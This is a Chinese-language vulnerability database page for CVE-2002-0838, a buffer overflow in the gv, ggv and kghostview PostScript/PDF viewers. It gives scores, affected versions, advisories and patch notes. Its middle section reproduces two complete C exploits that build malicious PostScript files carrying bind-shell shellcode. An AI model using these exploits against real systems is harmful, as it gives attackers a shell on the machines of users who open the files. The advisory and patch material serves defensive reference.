CVE-2002-0838
CVSS4.6
发布时间 :2002-10-10 00:00:00
修订时间 :2016-10-17 22:22:25
NMCOES    

[原文]Buffer overflow in (1) gv 3.5.8 and earlier, (2) gvv 1.0.2 and earlier, (3) ggv 1.99.90 and earlier, (4) gnome-gv, and (5) kghostview in kdegraphics 2.2.2 and earlier, allows attackers to execute arbitrary code via a malformed (a) PDF or (b) PostScript file, which is processed by an unsafe call to sscanf.


[CNNVD]gv远程缓冲区溢出漏洞(CNNVD-200210-245)

        
        gv是一款PDF和Postscript文件的查看程序,由Johannes Plass维护,可使用在多种Unix操作系统下。
        gv不安全的使用sscanf()调用解析PostScript和PDF文件,攻击者可以利用这个漏洞以用户进程权限在系统上执行任意指令。
        要利用这个漏洞,攻击者必须发送PDF或者PostScript文件并诱使用户从命令查看文件,由于gv一般不以setuid root属性安装,攻击者只能利用这个漏洞以查看文件进程的权限执行任意指令。由于问题出现发生在用于解析PostScript和PDF文件的sscanf()函数中。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gv:gv:2.7b4
cpe:/a:gv:gv:3.5.3
cpe:/a:ghostview:ghostview:1.4.1
cpe:/a:gv:gv:2.7b3
cpe:/a:gv:gv:3.1.6
cpe:/a:gv:gv:3.4.3
cpe:/a:gv:gv:3.5.2
cpe:/a:gv:gv:3.2.4
cpe:/a:gv:gv:3.4.2
cpe:/a:gv:gv:2.7b5
cpe:/a:gv:gv:3.1.4
cpe:/a:gv:gv:3.0.0
cpe:/a:gv:gv:3.4.12
cpe:/a:ghostview:ghostview:1.5
cpe:/a:ghostview:ghostview:1.4
cpe:/a:gv:gv:3.0.4
cpe:/a:ghostview:ghostview:1.3
cpe:/a:gv:gv:2.7b2
cpe:/a:gv:gv:2.7b1
cpe:/a:ggv:ggv:1.0.2
cpe:/a:gv:gv:2.7.6
cpe:/a:gv:gv:2.9.4
cpe:/a:gv:gv:3.5.8

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0838
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0838
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-245
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-053.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-053.0
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000542
(UNKNOWN)  CONECTIVA  CLA-2002:542
http://marc.info/?l=bugtraq&m=103305615613319&w=2
(UNKNOWN)  BUGTRAQ  20020926 iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
http://marc.info/?l=bugtraq&m=103305778615625&w=2
(UNKNOWN)  BUGTRAQ  20020926 Errata: iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
http://marc.info/?l=bugtraq&m=103487806800388&w=2
(UNKNOWN)  BUGTRAQ  20021017 GLSA: ggv
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/47780&zone_32=category:security
(UNKNOWN)  CONFIRM  http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/47780&zone_32=category:security
http://www.debian.org/security/2002/dsa-176
(UNKNOWN)  DEBIAN  DSA-176
http://www.debian.org/security/2002/dsa-179
(UNKNOWN)  DEBIAN  DSA-179
http://www.debian.org/security/2002/dsa-182
(UNKNOWN)  DEBIAN  DSA-182
http://www.iss.net/security_center/static/10201.php
(VENDOR_ADVISORY)  XF  gv-sscanf-function-bo(10201)
http://www.kb.cert.org/vuls/id/600777
(VENDOR_ADVISORY)  CERT-VN  VU#600777
http://www.kde.org/info/security/advisory-20021008-1.txt
(UNKNOWN)  CONFIRM  http://www.kde.org/info/security/advisory-20021008-1.txt
http://www.mandriva.com/security/advisories?name=MDKSA-2002:069
(UNKNOWN)  MANDRAKE  MDKSA-2002:069
http://www.mandriva.com/security/advisories?name=MDKSA-2002:071
(UNKNOWN)  MANDRAKE  MDKSA-2002:071
http://www.redhat.com/support/errata/RHSA-2002-207.html
(UNKNOWN)  REDHAT  RHSA-2002:207
http://www.redhat.com/support/errata/RHSA-2002-212.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2002:212
http://www.redhat.com/support/errata/RHSA-2002-220.html
(UNKNOWN)  REDHAT  RHSA-2002:220
http://www.securityfocus.com/bid/5808
(VENDOR_ADVISORY)  BID  5808

- 漏洞信息

gv远程缓冲区溢出漏洞
中危 边界条件错误
2002-10-10 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        gv是一款PDF和Postscript文件的查看程序,由Johannes Plass维护,可使用在多种Unix操作系统下。
        gv不安全的使用sscanf()调用解析PostScript和PDF文件,攻击者可以利用这个漏洞以用户进程权限在系统上执行任意指令。
        要利用这个漏洞,攻击者必须发送PDF或者PostScript文件并诱使用户从命令查看文件,由于gv一般不以setuid root属性安装,攻击者只能利用这个漏洞以查看文件进程的权限执行任意指令。由于问题出现发生在用于解析PostScript和PDF文件的sscanf()函数中。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用Kghostview工具代替gv来查看PDF或者PostScript文件。
        厂商补丁:
        gv
        --
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://wwwthep.physik.uni-mainz.de/~plass/gv/

- 漏洞信息 (21871)

GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1) (EDBID:21871)
linux local
2002-09-26 Verified
0 zen-parse
N/A [点击下载]
source: http://www.securityfocus.com/bid/5808/info

gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.

It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.

// gv <=3.5.8 remote exploit by priestmaster
#include <stdio.h>

#define STDALIGN	264	// Standard align
#define SCBUF		800	// Shellcode buffer size
#define GARBAGE		100	// Garbage for the end
				// of the evil_buffer
#define NOP		'G'	// instead of "\x90" 


// Copyright (c) Ramon de Carvalho Valle
// Bind shell port number 65535
char bindcode[]= /*  72 bytes                          */
    "\x31\xdb"              /*  xorl    %ebx,%ebx                 */
    "\xf7\xe3"              /*  mull    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x43"                  /*  incl    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x6a\x02"              /*  pushl   $0x02                     */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\xff\x49\x02"          /*  decl    0x02(%ecx)                */
    "\x6a\x10"              /*  pushl   $0x10                     */
    "\x51"                  /*  pushl   %ecx                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    $0x66,%al                 */            
    "\xcd\x80"              /*  int     $0x80                     */
    "\x89\x41\x04"          /*  movl    %eax,0x04(%ecx)           */
    "\xb3\x04"              /*  movb    $0x04,%bl                 */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x59"                  /*  popl    %ecx                      */
    "\x93"                  /*  xchgl   %eax,%ebx                 */
    "\xb0\x3f"              /*  movb    $0x3f,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x49"                  /*  decl    %ecx                      */
    "\x79\xf9"              /*  jns     <bindsocketshellcode+45>  */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */            
    //"\xb0\x0b"              /*  movb    $0x0b,%al   		  */
    // 0b isn't allowed (filter). I use xor %eax, %eax
    // and eleven inc %al. It's the same as \xb0\x0b
    "\x31\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
    "\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
    "\xcd\x80"
; 

// How to start the exploit
void usage(char *prgname)
{
       printf("\nUsage: %s align retaddr \n\n"
                       "align (0 on SUSE 7.0)\n"
                       "retaddr (return address (should point to shellcode))\n");
       exit(0);
}

/////////////////////////////////////////

main(int argc, char **argv)
{
	int align;	// Align for the buffer
	long retaddr;	// return address
	
	char buf[BUFSIZ];	// The evil buffer
	char *p;		// Pointer to evil buffer

	if(argc != 3)		// 2 Arguments required
	{
		usage(argv[0]);
	}

	// Get align and return address from parameters
	align = atoi(argv[1]);
	retaddr = strtoul(argv[2], 0 , NULL);

	/* DEBUG, Shellcode testing
	void (*dsr)();
	(long) dsr = &bindcode; 
	dsr(); */

	// Point to buffer
	p = buf;

	// Memset the buffer with NOP's
	memset(p, NOP, BUFSIZ);

	p += STDALIGN+align;

	// Write return address in buffer (It's a very simple stack overflow).
	*((void **)p) = (void *) retaddr;
	p+=4;

	// Put shellcode in buffer
	p+=SCBUF-strlen(bindcode)-1;
	memcpy(p, bindcode, strlen(bindcode));
	p += strlen(bindcode);
	
	// Add some garbage to end of buffer
	p += GARBAGE;
	
	// Null terminate buffer
	*p = 0;
	
	// Generate pdf file
	printf("%%!PS-Adobe-3.0\n");
	printf("%%%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)\n");
	printf("%%%%CreationDate: Sat Jun 15 15:30ish\n");

	// In page order, the stack overflow occur.
	printf("%%%%PageOrder: %s\n", buf);
	printf("%%%%EndComments\n");
	printf("%%%%EOF");	
}
		

- 漏洞信息 (21872)

GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2) (EDBID:21872)
linux local
2002-09-26 Verified
0 infamous42md
N/A [点击下载]
source: http://www.securityfocus.com/bid/5808/info
 
gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.
 
It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.

/*
 * gv postscript viewer exploit , infamous42md AT hotpop DOT com
 *
 * run of the mill bof.  spawns a remote shell on port 7000.  woopty doo. if
 * someone has been able to exploit the heap overflow in cfengine, please email
 * me and teach me something. after days of pain i've concluded it's not
 * possible b/c you can't manipulate the heap enough to get anything good in
 * front of you.  please prove me wrong so i can learn.
 *
 * shouts to mitakeet
 *
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  [n00b@localho.outernet] gcc -Wall -o gvown gvown.c
 *  [n00b@localho.outernet] ./gvown 0xbffff350
 *  [n00b@localho.outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- "
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"


/* call them on port 7000, mine */
char remote[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


int main(int argc, char **argv)
{
    int len, x, fd;
    char    buf[BS];
    u_long  retaddr;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);

    /* create 3vil buf */
    memset(buf, NOP, BS);
    strcpy(buf, PS_COMMENT);
    len = strlen(buf);
    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 1;   /* + NULL */

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");

    if(write(fd, buf, len) < 0)
        die("write");

    close(fd);

    return 0;
}		

- 漏洞信息

8649
gv sscanf Multiple File Format Handling Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2002-12-04 Unknow
2004-08-12 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GV Malformed PDF/PS File Buffer Overflow Vulnerability
Boundary Condition Error 5808
Yes Yes
2002-09-26 12:00:00 2009-07-11 05:06:00
Vulnerability discovery credited to zen parse <zen-parse@gmx.net>.

- 受影响的程序版本

KDE KDE 3.0.3 a
KDE KDE 3.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -STABLE
+ FreeBSD FreeBSD 4.7 -STABLE
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
KDE KDE 3.0.2
+ Mandriva Linux Mandrake 8.2
KDE KDE 3.0.1
KDE KDE 3.0
+ Conectiva Linux 8.0
KDE KDE 2.2.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux Advanced Work Station 2.1
+ Sun Linux 5.0.7
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.5
KDE KDE 2.2.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Caldera OpenLinux Workstation 3.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
KDE KDE 2.2
KDE KDE 2.1.2
+ Conectiva Linux 7.0
KDE KDE 2.1.1
KDE KDE 2.1
KDE KDE 2.0.1
+ Conectiva Linux 6.0
KDE KDE 2.0
KDE KDE 1.2
- S.u.S.E. Linux 6.4
KDE KDE 1.1.2
+ Caldera OpenLinux 2.3
+ Mandriva Linux Mandrake 7.0
KDE KDE 1.1.1
KDE KDE 1.1
gv gv 3.5.8
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
- RedHat Linux 7.3
+ RedHat Linux 7.1 pseries
+ RedHat Linux 7.1 iseries
+ Sun Linux 5.0
gv gv 3.5.3
gv gv 3.5.2
gv gv 3.4.12
gv gv 3.4.3
gv gv 3.4.2
gv gv 3.2.4
gv gv 3.1.6
gv gv 3.1.4
gv gv 3.0.4
gv gv 3.0 .0
gv gv 2.9.4
gv gv 2.7.6
gv gv 2.7 b5
gv gv 2.7 b4
gv gv 2.7 b3
gv gv 2.7 b2
gv gv 2.7 b1
GhostView GhostView 1.5
GhostView GhostView 1.4.1
GhostView GhostView 1.4
GhostView GhostView 1.3
ggv ggv 1.99.90
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2
ggv ggv 1.1.96
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
ggv ggv 1.0.2
ggv ggv 0.82
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Debian Linux 2.2
KDE KDE 3.0.4
+ Conectiva Linux 8.0
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2

- 不受影响的程序版本

KDE KDE 3.0.4
+ Conectiva Linux 8.0
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ Gentoo Linux 1.2

- 漏洞讨论

gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.

It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.

- 漏洞利用

Exploit contributed by zen parse &lt;zen-parse@gmx.net&gt;. Exploit code has also been provided by priest priest &lt;priest@priestmaster.org&gt;, and &lt;infamous41md@hotpop.com&gt;.

- 解决方案

Red Hat has released an advisory. Updates for ggv are available. See the referenced advisory for further details.

The KDE Project has made a patch available for affected versions of kdegraphics/kghostview. Additionally, the KDE Project has identified the 3.0.4 series as being fixed against this vulnerability.

Gentoo Linux has released an advisory for ggv. Users who have installed app-text/ggv-1.99.90 and earlier are urged to update their systems by issuing the following commands:

emerge rsync
emerge ggv
emerge clean

Debian has released a new advisory DSA 179-1. Fixes for gnome-gv 0.82 and gnome-gv 1.1.96 are available. Debian GNU/Linux 3.0 alias woody also ships with KDE 2.2.2, which includes a vulnerable kghostview in the KDE-Graphics package.

Conectiva Linux has released an advisory. Information about obtaining and installing fixes for gv and kdegraphics can be found in the referenced advisory.

RedHat has released an advisory, RHSA-2002:220-40, that contains many fixes. Information about obtaining and applying fixes are available in the referenced advisory.

Red Hat has released an updated RHSA-2002-207 advisory containing new fixes to address this issue in Red Hat 7.1 pseries and iseries. Please see the attached web reference for further information.

Gentoo has released an advisory for gv that includes fixes. Fixes may be applied with the following commands:
emerge sync
emerge -pv ">=app-text/gv-3.5.8-r4"
emerge ">=app-text/gv-3.5.8-r4"

Fixes:


ggv ggv 0.82

ggv ggv 1.0.2

ggv ggv 1.1.96

ggv ggv 1.99.90

KDE KDE 2.0

KDE KDE 2.0.1

KDE KDE 2.1

KDE KDE 2.1.1

KDE KDE 2.1.2

KDE KDE 2.2

KDE KDE 2.2.1

KDE KDE 2.2.2

KDE KDE 3.0

KDE KDE 3.0.1

KDE KDE 3.0.2

KDE KDE 3.0.3 a

KDE KDE 3.0.3

gv gv 3.5.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站